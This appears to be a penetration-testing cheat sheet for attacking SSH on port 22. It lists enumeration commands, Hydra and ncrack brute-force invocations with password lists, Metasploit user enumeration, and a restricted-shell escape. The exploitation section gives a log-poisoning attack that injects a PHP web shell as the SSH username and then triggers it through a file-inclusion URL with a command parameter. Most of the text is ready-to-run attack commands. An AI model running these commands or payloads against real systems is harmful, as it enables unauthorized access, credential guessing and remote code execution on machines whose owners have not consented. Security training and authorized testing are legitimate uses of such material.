SSH 22

Checklist

• Check for SSH version vulnerabilities

• User enumeration possibilities

• Verify if host keys match other systems

• Test if password login is enabled (prompts for a password)

• nmap -sV --script=ssh-hostkey -p22 10.10.10.10

• Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar

Commands and Tools

• Banner Grabbing:

  nc -vn <target_ip> 22
  nmap -sV --script=ssh-hostkey -p22 <target_ip>

• Nmap SSH Scripts:

  ls -lh /usr/share/nmap/scripts/ssh
  sudo nmap <target_ip> -p 22 -sV --script=ssh-hostkey

• Key Scanning:

  ssh-keyscan -t rsa -p 22 <target_ip>

---

Brute Forcing

• Hydra Brute Force:

  sudo hydra -l <username> -P rockyou.txt -v <target_ip> ssh -s 22 -t 4

  Good password lists:

  /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt

• NCRACK:

  ncrack -p 22 --user <username> -P ./passwords.txt <target_ip>

---

Private Keys

• Using Found Private Keys:

  sudo chmod 600 <key_file>
  ssh -i <key_file> <user>@<target_ip>

• Generate Private Keys:

  ssh-keygen -t rsa

---

System Administration

• Check SSH Status:

  sudo service ssh status

• Start/Stop/Restart SSH Server:

  sudo service ssh start
  sudo service ssh stop
  sudo service ssh restart

• Verify SSH Process and Ports:

  netstat -tulpn | grep sshd

---

Metasploit Modules

• Enumerate Users:

  use auxiliary/ssh/ssh_enumusers
  set rhost <target_ip>
  set rport 22
  set threads 1
  set threshold 5
  run

---

Exploitation

• SSH Log Poisoning (Requires RCE Vulnerability):

  1. Log injection:

     ssh ''@<target_ip>

  2. Injected URL:

     http://<target_ip>/search.php?id=/var/log/auth.log&cmd=<your_command>

• Remote Code Execution (RCE) via Username:

  ssh '<?php system($_GET["cmd"]);?>'@<target_ip>

• Escape Restricted Shell (Rbash):

  sudo ssh <user>@<target_ip> -t "bash --noprofile"

---

Vulnerable Versions

• OpenSSH < 7.7 (CVE-2018-15473):

  • Enumerate usernames:

    python ssh-username-enum.py <target_ip> -w usernames.txt

---

Additional Notes

• Forcing Specific Authentication Method:

  ssh -v <target_ip> -o PreferredAuthentications=password

• Analyze Debug Output:

  ssh -v <username>@<target_ip>